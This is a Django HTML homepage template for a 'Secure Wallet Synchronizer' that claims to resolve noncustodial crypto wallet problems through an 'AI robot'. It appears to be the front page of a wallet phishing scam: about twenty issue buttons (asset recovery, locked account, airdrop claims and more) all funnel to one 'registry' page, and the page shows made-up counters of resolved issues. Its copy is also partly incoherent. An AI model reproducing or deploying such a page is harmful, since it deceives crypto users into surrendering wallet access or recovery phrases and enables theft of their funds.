<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="SecureSync Wallet is a free cryptocurrency website template designed to make your life better.">
    <meta name="keywords" content="Cryptocurrency, Wallet, Blockchain, Migration, Validation, Assets Recovery, Rectification, High Gas Fees, Slippage Error, Transaction Error, Cross Chain Transfer, Staking, Swap/Exchange, Claim Reflection, Dapps, Login Issues, Airdrop, NFTS, Balance, Whitelist, Transaction Delay, Locked Account, Trading Wallet, Free Template.">
    <title>Secure Wallet Synchronizer - Homepage</title>
    {% load static %}
    <link rel="icon" href="{% static 'img/favicon.png' %}">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;500&family=Roboto:wght@500;700&display=swap">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css">
    <link rel="stylesheet" href="{% static 'lib/animate/animate.min.css' %}">
    <link rel="stylesheet" href="{% static 'lib/owlcarousel/assets/owl.carousel.min.css' %}">
    <link rel="stylesheet" href="{% static 'css/bootstrap.min.css' %}">
    <link rel="stylesheet" href="{% static 'css/style.css' %}">
</head>
<body>
    <!-- Spinner Start -->
    <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-content-center">
        <div class="spinner-grow text-primary" role="status"></div>
    </div>
    <!-- Spinner End -->

    <!-- Navbar Start -->
    <nav class="navbar navbar-expand-lg bg-white navbar-light sticky-top p-0 px-4 px-lg-5">
        <a href="{% url 'home' %}" class="navbar-brand d-flex align-items-center">
            <h2 class="m-0 text-primary">
                <img class="img-fluid me-2" src="{% static 'img/hero-img-home-2.417386c3.png' %}" alt="" style="width: 45px">
                Secure Wallet Synchronizer
            </h2>
        </a>
        <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse">
            <span class="navbar-toggler-icon"></span>
        </button>
    </nav>
    <!-- Navbar End -->

    <!-- Header Start -->
    <div class="container-fluid hero-header bg-light py-5 mb-5">
        <div class="container py-5">
            <div class="row g-5 align-items-center">
                <div class="col-lg-6">
                    <h1 class="display-4 mb-3 animated slideInDown">Make Better Life With Trusted Secure Wallet Synchronizer</h1>
                    <p class="animated slideInDown">
                        Every digital artwork on Upside is authentic and truly unique.
                        Blockchain technology makes this new approach to digital ownership possible.
                        Open and decentralized protocol for syncing various Wallets issues on Secure Server. This is not an app but a protocol that establishes a remote resolution between all noncustodial wallets.
                        It is an online server which gets you across to every wallet representative to enable effective complaint and rectification of issues.
                        You will be on a chat with an Artificial Intelligence Robot with zero Human interference.
                    </p>
                    <a class="btn btn-primary py-3 px-4 animated slideInDown" href="{% url 'registry' %}">Connect Wallet</a>
                    <a class="btn btn-primary py-3 px-4 animated slideInDown" href="{% url 'registry' %}">Select Chain</a>
                </div>
                <div class="col-lg-6 animated fadeIn">
                    <img class="img-fluid animated pulse infinite" style="animation-duration: 3s" src="{% static 'img/hero-1.png' %}" alt="">
                </div>
            </div>
        </div>
    </div>
    <!-- Header End -->

    <!-- Features Start -->
    <section class="issues">
        <div>
            <h2>Make Your Selection Below</h2>
        </div>
        <div class="issues-link">
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Migration Issues</h2>
                    <p>Click here for migration related issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Validate or Synchronize</h2>
                    <p>Click here for Validate or Synchronization issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Assets Recovery</h2>
                    <p>Click here for Assets Recovery issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Rectification Issues</h2>
                    <p>Click here for Rectification issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>High Gas Fees</h2>
                    <p>Click here for High Gas Fees issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Slippage Error</h2>
                    <p>Click here for Slippage Error issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Transaction Error</h2>
                    <p>Click here for Transaction Error issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Cross Chain Transfer</h2>
                    <p>Click here for Cross Chain Transfer issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Staking Issues</h2>
                    <p>Click here for Staking issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Swap/Exchange</h2>
                    <p>Click here for Swap/Exchange issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Claim Reflection</h2>
                    <p>Click here for Claim Reflection issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Connect to Dapps</h2>
                    <p>Click here for Connect to Dapps issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Login Issues</h2>
                    <p>Click here for Login issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Claim Airdrop</h2>
                    <p>Click here for Claim Airdrop issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>NFTS Issues</h2>
                    <p>Click here for NFTS issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Missing/Irregular Balance</h2>
                    <p>Click here for Missing/Irregular Balance issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Whitelist Issues</h2>
                    <p>Click here for Whitelist issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Transaction Delay</h2>
                    <p>Click here for Transaction Delay issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Locked Account</h2>
                    <p>Click here for Locked Account issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Trading Wallet Issues</h2>
                    <p>Click here for Trading Wallet issues</p>
                </a>
            </div>
            <div class="links">
                <a class="btn btn-primary" href="{% url 'registry' %}">
                    <h2>Other Issues Not Listed</h2>
                    <p>Click here for Other Issues Not Listed issues</p>
                </a>
            </div>
        </div>
    </section>
    <!-- Features End -->

    <!-- Facts Start -->
    <div class="container-xxl bg-light py-5 my-5">
        <div class="container py-5">
            <div class="row g-5">
                <div class="col-lg-4 col-md-6 text-center wow fadeIn" data-wow-delay="0.1s">
                    <img class="img-fluid mb-4" src="{% static 'img/icon-9.png' %}" alt="" />
                    <h1 class="display-4" data-toggle="counter-up">149056</h1>
                    <p class="fs-5 text-primary mb-0">Total Issues Submitted</p>
                </div>
                <div class="col-lg-4 col-md-6 text-center wow fadeIn" data-wow-delay="0.3s">
                    <img class="img-fluid mb-4" src="{% static 'img/icon-10.png' %}" alt="" />
                    <h1 class="display-4" data-toggle="counter-up">121334</h1>
                    <p class="fs-5 text-primary mb-0">Total Issues Resolved</p>
                </div>
                <div class="col-lg-4 col-md-6 text-center wow fadeIn" data-wow-delay="0.5s">
                    <img class="img-fluid mb-4" src="{% static 'img/icon-2.png' %}" alt="" />
                    <h1 class="display-4" data-toggle="counter-up">27722</h1>
                    <p class="fs-5 text-primary mb-0">Total Pending Issues</p>
                </div>
            </div>
        </div>
    </div>
    <!-- Facts End -->

    <!-- Back to Top -->
    <a href="#" class="btn btn-lg btn-primary btn-lg-square rounded-circle back-to-top">
        <i class="bi bi-arrow-up"></i>
    </a>

    <!-- Footer Start -->
    <footer>
        <small>&copy; 2023 Secure Wallet Synchronizer</small>
    </footer>
    <!-- Footer End -->

    <!-- JavaScript Libraries -->
    <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script>
    <script src="{% static 'lib/wow/wow.min.js' %}"></script>
    <script src="{% static 'lib/easing/easing.min.js' %}"></script>
    <script src="{% static 'lib/waypoints/waypoints.min.js' %}"></script>
    <script src="{% static 'lib/owlcarousel/owl.carousel.min.js' %}"></script>
    <script src="{% static 'lib/counterup/counterup.min.js' %}"></script>
    <script src="{% static 'js/main.js' %}"></script>
</body>
</html>